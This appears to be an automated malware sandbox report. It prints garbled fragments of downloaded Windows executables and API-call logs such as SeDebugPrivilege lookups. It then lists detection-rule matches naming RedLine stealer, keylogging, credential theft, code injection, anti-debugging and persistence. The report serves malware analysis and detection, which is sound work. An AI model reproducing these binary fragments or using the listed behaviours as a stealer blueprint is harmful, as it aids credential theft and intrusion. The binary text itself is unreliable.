buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd† chð" š `h—@@`s (ð ) È p- ( Å @(v ð.text˜ š  `.rdataÄó° ô¢ @@.dataX;° – @À.pdata)ð *ª @@.B1J Ô `.gxfg€@ ò @@.retplneŒ`  .tls p  @À_RDATAô€  @@.relocÈ   @B.jssL  L" @À.jssLð Ln @ÀAWAVAUATVWUSHìˆH‹¦£ H1àH‰„$€‹I³ ‹-G³ Xÿ¯Ø‰Ø÷Ѓàþƒó Ãûÿ”D$vA”ÀA•Áƒý AŸÂƒý œD$wœÃE ÂA‰ØE0ÈA ØD ËDÓD‰À0ؽùɜĸl߉¦EńÛDè‰ÖI‰ÎE„ÀDèA¹l߉¦L‹Q¸4_3YA¸è¯›;f=篛;)=l߉¦t =ùɜÄuë駸诛;=篛;~áf.„=诛;ts=4_3Yu¶D$vD¶\$w‰Â€ò‰Ñ Á€ñ‰Ã0ËÁ€ñىÈD ÙA€ó4D ØÁ‰ÐD ØA0ÓAÃD‰Ú0ÊAöø诛;AEÁöÁADÁöÒöÂAEÀ=篛;Ž_ÿÿÿë†L‰T$x‰è=篛;ŽKÿÿÿéoÿÿÿH‹|$xL‰ñè—‹ ð± DyÿD¯ùE‰üA÷ÔD‰ââ4Ú0¹E‰øAàË%ÏFA ÐAð5Ú0¹E àAƒøÿ”D$v‹ ·± ”ÉL$ ƒù œÁœD$w0ˉÚöÒ Ê‰Ù0ф۽ùɜĻl߉¦E݄Һl߉¦DÚH‰D$@„ÉE݉\$$A÷ÐI‹nº4_3Y¸è¯›;f„ú篛;(úl߉¦t úùɜÄuèëwºè¯›;ú篛;~áf„ú诛;tBú4_3YuÀ¶L$v¶T$w0ʉӀó ˉÙ0ÑöÁ¹l߉¦EÈö‰ÊEÐöÃDсú篛;~ë¶H‰l$x‹T$$ú篛;Žyÿÿÿ량ø÷Ð%fp=A‰úAâ™bÂA Â÷ÖAòfp=A òD‰Ð÷Ð1þ÷Ö!þ‰ñ÷ÑD‰Òâï#ž%üÜa ÐA ʁáï#žæüÜa Î1ÆA÷ÒA òH‹|$xHÁïD‰à%Û  'E‰ùAá$ó_ØA ÁAñÚ  'E áAƒùÿ•Á‹D$ ƒø AœÃƒø ŸÀ‰Ã Ë0ÁˉÚ0ʾl߉¦ºùɜÄEքۻùɜÄEڄÉDډ\$4D‰áƒáþAƒçA ÏE1üE…ü•Á” ÂA ËAӉ Ê0ÈЉÁD0Ù¹ùɜÄEκùɜĄÀEщ|$LE„ÛDщT$0A÷ÑA½B~ÇD$(H‰l$8Aý&¦")é÷H‹D$xA½±¾R-f.„fAý&¦"ŽÓAýF`<޶Aý"юb^AýG`<„CAý–ÿÍ<„SAýϊFu¶‹,¯ ‹ *¯ Pÿ¯Ð‰Ð÷Ð% ¬Xâ_éS§ ‰Ð5^éS§ƒàþò¡¬X ƒúÿ”À•ƒù œÃƒù ŸÁ ÈÑ ÓÉØ0ȄÛA½šU¯Âº±¾R-DEê„ɹšU¯ÂDEé„ÀéÍf.„Aý°¾R--Aý'¦"„ÊAýè°²+„ïAýHiý+…üþÿÿ‹r® ‹ p® Pÿ¯Ð‰Ð÷Ѓàþƒò ‰Ð÷Ð%㋄7ât{È Âòt{È•À”ƒù œÃƒù ŸÁ Ê ÃӉÊ0 ÁщÈ0؄ÉA½hф¸¹žïxDEé„ÛDDéD‰\$p„À¸hф¸é Aý#юb„‚Aýžïx„'AýXõð{…TþÿÿH‹D$XHƒøA½G`<¸Hiý+DDèE1ÛAý&¦"9þÿÿf.„fAý1¼ŽAýÒß½øqAý2¼„øAýšU¯Â„Aý0ö…ßýÿÿE…ü‹D$L‹D$L‹D$L‹D$L‹D$L‹D$LH‹D$@”D$vƒ|$ œD$w¸4_3Yf.„=篛;)=l߉¦t =ùɜÄuëém¸è¯›;=篛;~áf.„=诛;tK=4_3Yu¶D$v¶L$w4€ñ‰ÂÊ0Á‰Ð0Ȩ¾è¯›;¸l߉¦EðöÁ‰ð¹è¯›;EÁöÂEÆ=篛;~‡ë®H‰l$x‹D$0=篛;Žqÿÿÿ똄Aýv9ذŽ)Aýw9ذ„êAýã+n¸„Aýhф¸…ÌüÿÿH‹D$P¾8‹L$p‰Ê÷҉Ð% %á\à† Á‰ÎöÀ‚ñh!Ê]ë‡7‰Ð÷Љû÷Ӊýõ]ë‡7!݁ç¢xȁáJ/l1æÀƒ ΁âJ/l1% È Ð1ð‰é!ù1ïH‹l$8 ωÁ÷Ñ!ù÷×!Ç ÏiǕéÑ[‹|$h‰ù÷Ñ‰Ê Â÷Ð÷ҁáO ¹ç°ãóF ρ÷O ¹ Ç÷׉Ð!ø1× Ç‹‹« ‹ ‰« Pÿ¯Ð‰Ð÷
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $A!S@@@±ÜŽ @±ÜŒy@±Ü@Ü"|@Ü"{@Ü"z#@ 8ü@ 8ì@@~PA¡#zN@¡#€@@è@¡#}@Rich@PEL†­Zà  št¦â°@P@´†´Ð :ü=PvT¤v0p@°à4‚.text7™š `.rdata`í°îž@@.data0  Œ@À.wixburn8À–@@.rsrc :Ð<˜@@.relocü=>Ô@B¡°D£8¶FጰD£@¶Fá °D£X¶FሰD£D¶FᄰD£H¶Fá°D£<¶FူD£L¶Fá°D£P¶Fá|°D£T¶FáT³D£Ü¶FÃÌÌU‹ìƒì0¡ F3ʼnEüS‹]3ÀV‹uWP‰EЃÏÿ‰EԍEÔPÇEØ`´DÇEÜx´DÇEàˆ´DÇEä ´DÇE踴DÇEìдDÇEðè´DÇEôµDÇEøµDèê"…Àxjh€jjjh€ÿuÔÿä°D‹øVè@…Àtèïë j EØPè[EÐPÿuVWSèl@‹ðƒÿÿtWÿà°Dƒ}ÔtÿuÔèñD…öx‹uЋMü‹Æ_^3Í[èÏ‹å]ÂU‹ì‹EƒÀüPÿì°D]ÂU‹ìQSVW3öVVjV‰uüÿð°Dh8µDÿø°D‹ØhLµDSÿè°D‹=ô°D…Àt hÿЅÀu9ÿ×hhµDSÿè°D…Àt h4µDÿЅÀuÿ×9u v‹}EüPÿ4·è7&F;u rî_^[‹å]Â3ÀPPjPÿð°DÃU‹ìQQVW3ÿEüWh|µDP‰}ü‰}øè½ ‹ð…öxbWÿuEüPèª ‹ð…öxOEøPÿuüÿL³D…Àu-ÿô°D‹ð…ö~ ·öÎ€…öx¾@€VjchµDè¤%ëH‹E‰‹E ‹MøI‰9}ütÿuüè™C_‹Æ^‹å] U‹ìQSVW‹}3Û3ö‰]ü9t1ÿ7è)‹ðƒþÿu ¸W€é„EüÑîPhÿÿÿÿ7èÔ …Àxn‹]ü‹}…ÿuEPhÿÿÿÿu èµ …ÀxO‹}‹ÎG+Ë;Èsÿu;‹]4EVSè…Àx&ë‹]ƒ;thjjWÿu Vÿ3èYë¸ÿÿ€_^[‹å]ÂU‹ìƒì ƒeüSV‹uW3ÿ!}ø‰}ô9>t,ÿ6èO(‹ø‰}ôƒÿÿu ¾W€éšÿ6‹ßÿ±DÑë‰Eøuÿu »SV腋ð…öxt‹}üÿu‹EÿuSÿ0è! ‹ðþz€u*‹E…ÿu‹8‹Møƒ 3Òf‰Oÿu ÛSPè@‹ð…öx3öFƒþt¶‹Ç‰}ü‹}ô…Àtƒ} t‹È…ÿt ÆAƒïu÷Pèä%_‹Æ^[‹å]ÂU‹ì‹E V=ÿÿÿr¾€ë]W‹}Àƒ?t-3ö9utM ‰u QVPÿ7è¡&‹ð…öx4‹E ëVPÿ7èh&ë jPè½$3ö…Àu¾€Vjmh µDèw#ë‰_‹Æ^] U‹ì‹ESV3öƒËÿ90tÿ0è'‹ð;óu¸W€ë[ÑîW‹}…ÿu ÿu ÿ±D‹øO;Ïr‹ÙÀ%€;Ïr1;ósÿu‹óS‹]Sè&ÿÿÿ…Àxë‹]hjjWÿu Vÿ3èŽ_^[]ÂU‹ìf‹Ej0Yf;Èw fƒø9w*ÁëjaYf;Èw fƒøfw,Wë,7]ÂU‹ì‹M‹E …Éx‰3Àëƒÿ¸€]ÂU‹ìS‹]VW‹}Wÿu Sèó ‹ð…öx`…ÿuEPhÿÿÿÿ3èþ‹ð…öxF‹}Wÿ3Wÿ3ÿujÿ±D…Àu.ÿô°D‹ð…ö~ ·öÎ€…öx¾@€Vhq h µDè"_‹Æ^[]ÂU‹ìƒì ‹E V%W‹} ‰Eôt8‹M3ö…Éu…ÿuÿÿÿÿv¾W€…öx…ÿtE PWQèê‹ð‹E ë'3Àë&3ö…ÿtÿÿÿÿv¾W€…öx E PWÿuëÏ3À‹M‰Eü…öˆS‹ß+؉U }ÿÿÿ‰]ør ¾W€é§ƒ}ô‹Mt …Éu ƒe¹œµD‹E 3ö©àÿÿt ‹M¾W€ë~ƒûw&9u„ €9„—‹M‹ñ÷Þöƒæ#ÆW€ëSÿu!uEQPSRè.‹U ‹ðU+]‰U ‰]ø…öx&‹M ÷ÁtQƒûvLCÿP¶ÁPBPèŽáƒÄ ë3‹M‹E ©t…ÿtPEøPE PÿuüWQè,‹]ø…öyþz€u‹U ‹E…Àt‰‹E…Àt‰[_‹Æ^‹å]ÂU‹ìƒì ‹E V%W‹} ‰Eôt<‹M3À‹ð…Éu…ÿuÿÿÿÿv¾W€…öx…ÿtE PWQè•‹U ‹ð3Àë)‹Ðë(3À‹ð…ÿtÿÿÿÿv¾W€…öx E PWÿuëˋЋM‰Uü…öˆS‹ßQ+]ü}ÿÿÿ‰U ‰]ør¾W€ë(ƒ}ô‹Mt …Éu¹4µD‰E÷E àÿÿ‹ðt[¾W€‹M‹E ©t…ÿtPEøPE Pÿuü?PQè å‹]ø…öyþz€u‹U ‹E…Àt‰‹E…Àt‰[_‹Æ^‹å]ƒûwƒ}tØf9tӋM‹ñ÷Þöƒæ#ÆW€ë‰ÿu‰EEQPSRè‹M‹ð‹U +ى]øJ‰U …öˆYÿÿÿ‹M ÷Át‡ƒûv‚ƒø†vÿÿÿƒÀþP¶ÁPBPè—៎ éZÿÿÿU‹ìQQ‹U ¹ÿÿÿSV‹Â3ö%»W€W‹} ‰Eøt‹E…Àu…ÿu;ùv‹óë3ö…ÿt;ùv‹ó‹E…öˆ‹ß‰E ‰]ü9Mr¾W€…ÿ„´Æé¬ƒ}ø‹Mt …Éu ƒe¹œµD3ö÷Âàÿÿt¾W€…ÿ„ƒÆë~…ÿu#9u„¡€9„˜‹ð÷Þöƒæ#ÆW€ëWÿu!u QM QWPè‹M ‹ð‹E‹ß+ى]ü‰U …öx,‹U ÷ÂtƒûvCÿP¶ÂP‹E @PèwÞ‹EƒÄ …öy0‹M ÷Át…ÿtQMüQM QjWPè‹]ü…öyþz€u‹E…Àt‹M ‰‹E…Àt‰_‹Æ^[‹å]ÂU‹ìQQ‹M 3ÒS‹Á»W€V%‹òW‹} ‰Eø¸ÿÿÿt‹U…Òu…ÿu;øv‹óë …ÿt;øv‹ó‹U…öˆ/‹ß‰U ‰]ü9Er¾W€…ÿ„É3Àf‰鿃}ø‹Et …Àu ƒe¸4µD3ö÷Áàÿÿt¾W€…ÿ„–3Àf‰錅ÿu%9u„²3Éf9„§‹ò÷Þöƒæ#ÆW€ëeÿu3ÉPE ‰M PWRèi‹M ‹ð‹U‹ß+ى]üJ‰E …öx6‹M ÷Át'ƒûv"ƒøvƒÀþP¶ÁP‹E ƒÀPèðÜ‹UƒÄ …öy33ɋE ©
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $ù\Zî—Zî—Zî—–”_î—–’ìî—–“Kî—Kh”Pî—Kh“Kî—Kh’î—––Sî—Zî–Îî—¢iž[î—¢ih[î—¢i•[î—RichZî—PEd†²Fhð" +´ÖPv@Ð`\ d°àp3ÀÜ `½p ¼@Ѐ.text¨³´ `.rdatab\Ð^¸@@.data¤50@À.pdata3p4.@@.rsrcà°b@@.relocÜ À d@BH‰\$UH¬$0ÿÿÿHìÐWÀD$03ÛH‰\$@H‰\$HA¸H–œHL$0è ¿WÀD$PH‰\$`H‰\$hA¸HpœHL$Pèv¿WÀD$pH‰]€H‰]ˆA¸HLœHL$pèN¿WÀEH‰] H‰]¨A¸H)œHMè(¿WÀE°H‰]ÀH‰]ÈA¸HœHM°è¿WÀEÐH‰]àH‰]èA¸Hå›HMÐèܾWÀEðH‰]H‰]A¸HÛHMðè¶¾WÀEH‰] H‰](A¸H¡›HM萾WÀE0H‰]@H‰]HA¸H›HM0èj¾WÀEPH‰]`H‰]hA¸H]›HMPèD¾WÀEpH‰€H‰ˆA¸H5›HMp辐WÀ…H‰ H‰¨A¸H ›Hè潐WÀ…°H‰ÀH‰ÈA¸HàšH°è´½HD$0H‰D$ H…ÐH‰D$(HT$ H SèlhL ´kº A¸ HL$0èC^H Ø­H‹œ$àHÄÐ]éaÌÌÌH‰\$UH¬$PþÿÿHì°WÀD$03ÛH‰\$@H‰\$HA¸H>šHL$0轐WÀD$PH‰\$`H‰\$hA¸ H šHL$Pèæ¼WÀD$pH‰]€H‰]ˆA¸ HšHL$pè¾¼WÀEH‰] H‰]¨A¸Hñ™HMè˜¼WÀE°H‰]ÀH‰]ÈA¸HיHM°èr¼WÀEÐH‰]àH‰]èA¸H½™HMÐèL¼WÀEðH‰]H‰]A¸H£™HMðè&¼WÀEH‰] H‰](A¸H…™HM輐WÀE0H‰]@H‰]HA¸ Hk™HM0èÚ»WÀEPH‰]`H‰]hA¸HU™HMPè´»WÀEpH‰€H‰ˆA¸H1™HMp舻WÀ…H‰ H‰¨A¸ H ™HèV»WÀ…°H‰ÀH‰ÈA¸Hè˜H°è$»WÀ…ÐH‰àH‰èA¸H˜HÐèòºWÀ…ðH‰H‰A¸Hœ˜HðèÀºWÀ…H‰ H‰(A¸Hz˜H莺WÀ…0H‰@H‰HA¸ HX˜H0è\ºWÀ…PH‰`H‰hA¸H6˜HPè*ºWÀ…pH‰€H‰ˆA¸H ˜Hpèø¹WÀ…H‰ H‰¨A¸ Hâ—HèƹHD$0H‰D$ H…°H‰D$(HT$ H Oè~dL Ægº A¸HL$0èUZH *ªH‹œ$ÀHÄ°]é1]ÌÌÌÌÌH‰\$UH¬$PþÿÿHì°WÀD$03ÛH‰\$@H‰\$HA¸HJ—HL$0è ¹WÀD$PH‰\$`H‰\$hA¸ H(—HL$Pèö¸WÀD$pH‰]€H‰]ˆA¸ H—HL$pèθWÀEH‰] H‰]¨A¸Hù–HMè¨¸WÀE°H‰]ÀH‰]ÈA¸Hã–HM°è‚¸WÀEÐH‰]àH‰]èA¸HɖHMÐè\¸WÀEðH‰]H‰]A¸H«–HMðè6¸WÀEH‰] H‰](A¸H‘–HM踐WÀE0H‰]@H‰]HA¸Hw–HM0è귐WÀEPH‰]`H‰]hA¸H1–HMPèÄ·WÀEpH‰€H‰ˆA¸H-–HMp蘷WÀ…H‰ H‰¨A¸ H –Hèf·WÀ…°H‰ÀH‰ÈA¸Hè•H°è4·WÀ…ÐH‰àH‰èA¸ H¾•HÐ跐WÀ…ðH‰H‰A¸Hœ•HðèжWÀ…H‰ H‰(A¸Hz•H螶WÀ…0H‰@H‰HA¸ HX•H0èl¶WÀ…PH‰`H‰hA¸H2•HPè:¶WÀ…pH‰€H‰ˆA¸H•Hp趐WÀ…H‰ H‰¨A¸ Hâ”HèÖµHD$0H‰D$ H…°H‰D$(HT$ H #KèŽ`L Öcº A¸HL$0èeVH z¦H‹œ$ÀHÄ°]éAYÌHƒì(H ),èDH …¦HƒÄ(é YHƒì(A¹HÓ-E3ÀH Y-èH a¦HƒÄ(éðX@SHƒì ¹èÔéH -H‹Øèu—H¾E3ÀH‹ÓH‰-H z-èµ H f¦HƒÄ [é XH‹­5Læ,L‰§5H…ÒtH‹HcHL‰DPL‹5H‹5H…Òt H‹HcHL‰DPÃÌÌHƒì(H ‘,è\H ¦HƒÄ(é8XH ¦é,XH Q¦é XHƒì(A¹H.E3ÀH ™.蔙H e¦HƒÄ(éðW@SHƒì 3Éè×èH Ð-H‹Øèx–H½E3ÀH‹ÓH‰´-H ­-è¸H m¦H
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL£wLgà  "&è+%@@p(ÜÕ'‰è˜!d`(D V(@° .text©  `.rdata˜@@@.data@?à@Àss0‡  `ss18°@Àss2—À˜ `.rsrcD `( ž@@œÆ'&9(úÎ# €éR h…¡9Åd$Ý*çh"S_˜D$f3óÁl$¸öT$fÿÎÀt$æÁd$fö7dfÿÆèh²°7¸h)k?fò7dÀD$¦ƒ ˆh= *Lf‰hƒ` (é´ þ¨U,®nŽ»¹¶~IÄËOBDj›óë?«?|$&ÀUHE‰ÁýeT ž»cHØç»^Ï*Òêˆà±²hQÏQ/Ü¯ÃÕɬÛN8UTÀ’~Ý$\˧!‘2°ôÀ've_> Å_#úª…ÙX$¡Ÿ vÞêE^ ÿ›…%¿ GÊ8‘’³B:Y_vèä•2憞?«Ç§ÆÖ(Bù×ÀT8¾VÑ·À[èœãjcÃðP/sšæ`‚#yåÐhS¹•㎠ue¤÷՝ è7`<êïȦÈebú.ÊäñÒ2;TÉ6ËwäM˜ŽhJRÞ ÃÝe3§²áÙ8_÷œzÛ†Y5“««nG‰²Ò‚kŠÀ(Û=ˆ€!‹ª 2¶Ã¨üóÙd•ß'§¬ õŽœ°qïtŸûƒeSLTê­õ#)ý„ éNj` OœâN*ˆ¸ŸÙººöÁ<@xàы„™(7^8‹`„À ‰[ºÀºl8Ñ÷}À%Í>•4 ž¿To™þV=ÉÐA=§€ÊJ{=_$yUé(‹`…DÆû¸Üv˜LtŸ{ ‘‡ùæ¡›tŸûÔt[vÔÚæéE.z“lÑ÷.›“æfW•´Ge×¼ZXÙ-(ûVa§_$6}ñtŸ{¯v@›Ì)ÏÆ´jôNü®õ@üý]JâåÉsçL„³ŽU ½ð³[霠óÑÈS‚ÂTh¥HÕ0¸‰»nÎùQ.rדZ§K,¿{U§zéUžÿÊèÿWhÕîÙ¿ÂT5x¡ØxcÓ̐=IÈ%éà®:³”<Cؑý)ê‹ê˜ÓºtI’mb¯0joüô zo`Éþ™’wLž‹V“¢ )Ñ $ ž“;8˜‹ßz›C/ÁÌûˆFÑç¯þÄÌ{š£†Ž*lØ]t“ÌûþëFg:UFýÓéuˆêáéå.»ò9U Äަ‹L䈎ƒ½$ÔíoÀs~V2hóˆoj½XÆÉñÙ7‚¿¥t‰dÀþj_°MpAvÞ¥K)K²/[úTEã?·ùúÀLŸû]í«<2z+LŸ{O±º,@ÍÏ[Á°µ€ ¸³` ¦ÁÀáH6‹°MíÕÄè¤üi¬Iš6Š®äxEzµ‚*úÁÃ^*¯[^àٓùý„$s˜£]BÇ36ÕP¨‹Z³`Ýam.¦¥Â[LŸ{_ºü¿éioLŸûä%§{uU[»LŸ{ßP}œ Uóc^öåmÆýÛ·.³.Zß:êˆóUÉôË3Õw’ÉIBã_ၭ¹Ž´LŸûû»%ƒqƒ*Vá˜óÄ &Û†3IÕð(£Ä¨I5´//ÜȘ ù€b>Ì%?úùu’ÄT/ÿ2á׍TÌó[t(±Íåm\"¶·$ܾù1;àÔ ¶þ¬àÑy*ð!ÄT۟ðX#wöŠ/Ê~G‰Üdo¿€Üfòõ3ú;y éð±èé$‚÷’¶ÑfÿÀºø™;ó¸9Žã8é~f‰hŸšŠ¨èŽA»¸ŒXA·ËI‹âQDŽLàþÿ‰‘þQN‹¤þGs§D·”Ìp?úÿN‹´Hs§A‹òA¿ú¸,…NJ‹¬Hs§D‹ÉéÃX¾Rk¨eú§…ù ©SsÒxM`L žHf&‡gØIÊ«d´Ñ„øÀäáúÀpæšWçÖðdUõÊbMì˜%À%GËÊYh´ê/Bœ|$‘³ŠïHÇD$xnÞ8ÿt$Hd$è^ü Žâ6Õ-…ä­{†¢mwªad–žrëÄü?…€ÑùÌ`ÿÆÊ¶¸bU¬ü/¦[‡¹-x™ûg,¯û.û ýp¡,¯{*ëêf=L>ît1ˆójÓP â¹ ØÀ;†½Ã7T¥Û#»2ϐ$.²ï¯Ö/,¯û5‘æå ßÓP„t‹ì“pSiÓP&†ªÍ€<¶3#;,éw¤}K‹¦{ãÒ¤0-…âJI°ÌJÞ6…0©€ø[ÖÙ§ $ΟLׯT»;šRcUÁ„?Ÿ”Àeà•¤ê~{Ðå ©Âý2ye'zËXÅ4L'AÆTrº¿è@+î’/Ê: -¹à@{˔ÈM¦8Ԃ­rtièªúú'Ä"Ê¥WQÆT‡¸‰4Ñ5 FÚÀg|Ì¿ë^:ï ÒãÉRBncm.Á¤‡ŽÁ2Ì6éU>˜ÚdðÉ ÔGеêÐ@¶·ð$8¯G<ÁM«Ø29ÇÇ[X‡a“†#g²W·ßÇ9¯Gn ¬­9k‡®3ÆQøõ–{Tüƒâ{9«ÿWÞñÆPx!èpöôÀ9®‡Q™¬/ãE€Æ[àªÅÅ»/¾Ímb>£×nó"TÀõSmáN£¢>W®ìAfن[’wmqh³¬“¨5AàhéEªx«b`gx þ:[=dcZvb‚âºÇ 鯢:ªÒã}˜}bŽ€Àö^KQñpL/)1ø“x> ç ‹*Ç ,‡-õ p›{àí}^¢$p›ûz„…ᖋ2ëÑp›{ž>»¡ìPÚc "ŒUéýrz½X¸‰ã~ÞÑy ™±}£oc`AàÄlj*Ɛdyû*ÈT`ˆQ-u­œê~;£À`X ¾Ú;ÖVÅ)ʃþ]ëÃPŽa®xuèªV0ÈT}L‚§KäŸËR.ïæß­´“ÇD$‘Ú(ÐÊé“˹„š¿E‹4"f»ÉQH‰L$AŠL"ÀD$ ƒHÁt$ IÒfÁd$ cè“;Ã9rÐjXOU|6-0N Œ†ž] «÷zñ•æ Œº ¡Ÿ; Íq\º ¯Šãi¢l49uña ®,VNe¸ 8$Ë|ãÇ ¹9½Gà ‘Ck8ê· *¬/,K:«H ½ g¯â@esJóÑ#ä Ô –!#-vg5û#ºßf_ —I  N §òÙ ;‡Qg ÖÀsŸúšÙv¹÷+Øþçn­¦ˆ²
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd† Qùhð" „x3@0ìk``<( ¼ T”(&l «@H?À.textš‚„ `.rdatadÀ Œ@@.dataØ(pN@À.pdataT \@@.B8Ÿ À v `.gxfgpЂ@@.retplneŒð˜_RDATAôš@@.reloclœ@B.jssv v¤@À.jssv  v @À.rsrc¼ @@AWAVAUATVWUSHì˜H‹¦`H1àH‰„$‹õl‹-ólxÿ¯ø‰û÷ӁçQem‰Ø%÷®š’ ø5ö®š’ƒãþ Ãûÿ”D$:ƒý œD$;‰T$4I‰Ì¸ÞwAºhÍÅ A»ñdo¾¶ˆÓÆ=­9뎔ëm‹ŒlHÿ¯È‰È÷Љƒâþƒá Ñ÷Ñ Áƒùÿ”Àƒ=kl œÁ0ȉÂöÒ Ê‰Á0фÀ¸gÅe;½D2ÚYEńҺgÅe;D„ÉEÅf.„=­9ëŽ%=»þX^=fÅe;ŽÄ= òu<Ž=òu<„=ÎÍ@„³ =ñàòCu»D‰l$pD‰t$t‹D$L‹L$t9Á¸¹Ì ³¹><â;é«„=çéˆkŽQ=É|tŽ$=É|t„ =üBy„ =Þw…YÿÿÿŠD$:ŠL$;‰Â€ò0ȀñщÂ0ʨ¸övòè½òu<EÅöÁ¹övòèEÁöÂé²=aŠ+P=®9ë„§þÿÿ=½uÍ…þþÿÿH‹D$XHƒø¸¼þX¹›…±LÁE1ÿ=­9ëåþÿÿf.„=¸Ì ³I=±e÷£ŽI=8„–©Ž5=9„–©„Ú =kT&«„ =p ‘­…’þÿÿ¸µ´X’=­9ë~¶éŒþÿÿ=õvòèŽ>=—z«þŽT=˜z«þ„3 =›…±„6 =BZû…Iþÿÿ¸©{@¼=­9ëŽiÿÿÿé?þÿÿ=_E[O=¼þX„Z =D2ÚY…þÿÿ‹ =j‹=;jQÿ¯Ñ‰Ñ÷сáŒ(́âsì×2 ʉсñsì×2ò„(€â·ù€‰ÍåHø ՁõIøƒáþ é‰Ê÷ҁâHMρᷲç0 сñ·²ç0”Á•Àƒÿ œÃƒÿ ŸÂ Ñ ÃˉÙ0ф۸ÎÍ@½µ´X’EńҺÎÍ@éŸ=´´X’==ç°<€„¾ =M…Týÿÿ¸.cÁ‹L$d‰L$,=­9ëŽlþÿÿéBýÿÿ=.cÁ–=¹Ì ³„® =©{@¼…ýÿÿ‹ @i‹=>iQÿ¯Ñ‰Ñ÷сáõ¿A+â @¾Ô ʉՁõ @¾Ôò¤¹â¬¹ ‰éáSF_ø сñRF_øƒåþ ̓ýÿ”À•ƒÿ œÃƒÿ ŸÁÑ0ÉÈ0غïÄ6©¸BZûEЄۉнïÄ6©EńÉEÂ=­9ë޳ýÿÿé‰üÿÿ=²e÷£„6=ïÄ6©…hüÿÿ¸ñàòCE1öD‹l$<=­9뎀ýÿÿéVüÿÿ=gÅe;„ =><â;…5üÿÿHcD$tH‹L$@i •éÑ[‰ÈÁè‰Å÷Չêâ5Lƒàä ЉÊ÷Ò55L ЉÃ÷Ӂâp“×ñál( сñp“×ñ é‰Ê÷҉Ł劚jiãue•– ë ȁኚjiƒâu Ê1Ú÷Ð ÐiȕéÑ[iD$p•éÑ[÷ÐA‰ÅA ÍD‰ê÷Ò1È÷Ð!ȉÁ÷ÑD‰íå^Ї?â¡/xÀ êA ́á^Ї?%¡/xÀ È1ÐA÷ÕA ÅD‹t$tAƒÆ¸ñàòC=­9뎋üÿÿéaûÿÿ=èéˆk„) =¥ˆÆq…@ûÿÿ‹jgHÿ¯È‰È÷Ð%÷݁á€ã" Á‰È5€ã"ñ£4]á«4Ñ]‰ÂâTË.¢ ʁòUË.¢ƒàþ Ѓøÿ”Àƒ="g œÁ0ȉÂöÒ Ê‰Á0фÀ¸É|t½üByEńҺÉ|té²úÿÿ=bŠ+„j =7v7…®úÿÿ‹„$€‹„$€‹„$€‹„$€‹„$€‹„$€‹„$€‹„$€‹„$€‹„$€‹’fHÿ¯È‰È÷Љƒâþƒá Ñ1ȅÈ”Àƒ=tf œÁ0ȉÂöÒ Ê‰Á0фÀ¸EÝô”½p ‘­EńҺEÝô”éúÿÿ=övòè„Ù=¯U#ê…úÿÿH‹D$XHƒø¸½u͹ç°<€LÁ=­9ëŽûÿÿéåùÿÿ=`E[„É =8‘`g…Äùÿÿ‹ îe‹=ìeQÿ¯Ñ‰Ñ÷сá^ ;Xâ¡óħ ʉՁõ¡óħòX"PâøâfՉéá™* сñ™*ƒåþ ̓ýÿ”Á•Àƒÿ œÃƒÿ ŸÂ Ñ ÃˉÑ0ل۸gÅe;½®9ëEńҺgÅe;E‹T$0‰”$€é· =µ´X’„O =EÝô”…ùÿÿ‹„$€‹„$€‹„$€‹„$€‹„$€‹„$€
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x0020d800', u'virtual_address': u'0x0000c000', u'entropy': 7.984002744358319, u'name': u'.rsrc', u'virtual_size': u'0x0020e000'} entropy 7.98400274436 description A section with a high entropy has been found
entropy 0.984773951745 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
process system
url http://www.microsoft.com/schemas/ie8tldlistdescription/1.0
url http://purl.org/rss/1.0/
url http://www.passport.com
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Hijack network configuration rule Hijack_Network
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description RedLine stealer rule RedLine_Stealer_m_Zero
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description File Downloader rule Network_Downloader
description Match Windows Inet API call rule Str_Win32_Internet_API
description Install itself for autorun at Windows startup rule Persistence
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
Time & API Arguments Status Return Repeated

